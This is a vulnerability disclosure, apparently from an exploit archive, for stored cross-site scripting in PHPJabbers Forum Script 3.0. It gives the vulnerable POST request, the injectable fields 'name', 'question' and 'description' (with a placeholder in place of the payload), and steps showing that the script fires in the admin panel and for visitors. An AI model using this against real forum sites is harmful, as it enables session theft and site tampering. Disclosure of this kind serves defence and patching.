PHPJabbers Forum Script 3.0 Persistent Cross Site Scripting

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : https://www.phpjabbers.com/php-forum-script/                               │
│  Vendor   : PHPJabbers                                                                 │
│  Software : PHPJabbers Forum Script 3.0                                                │
│  Vuln Type: Stored XSS                                                                 │
│  Impact   : Manipulate the content of the site                                         │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│  Allow Attacker to inject malicious code into website, give ability to steal sensitive │
│  information, manipulate data, and launch additional attacks.                          │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

   Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

  CryptoJob (Twitter) twitter.com/0x0CryptoJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


## Stored XSS

-----------------------------------------------
POST /1687474733_118/preview.php?controller=pjLoad&action=pjActionAsk HTTP/1.1

ask_question=1&name=[XSS Payload]&[email protected]&question=[XSS Payload]&description=[XSS Payload]&category_id=3
-----------------------------------------------

POST parameter 'name' is vulnerable to XSS
POST parameter 'question' is vulnerable to XSS
POST parameter 'description' is vulnerable to XSS


## Steps to Reproduce:

1. Click on [+ New Question](as Guest)
2. Inject your [XSS Payload] in "Full name"
3. Inject your [XSS Payload] in "Question"
4. Inject your [XSS Payload] in "Description"
5. Select any [Category]
6. Save (=Submit)

5. When ADMIN Visit the [Questions] to Check [New Questions] on this Path (https://website/index.php?controller=pjAdminQuestions&action=pjActionIndex) in administration Panel
6. XSS will Fire & Executed on his Browser

7. Anyone visit your [Question Post] XSS will Fire & Executed on his Browser


[-] Done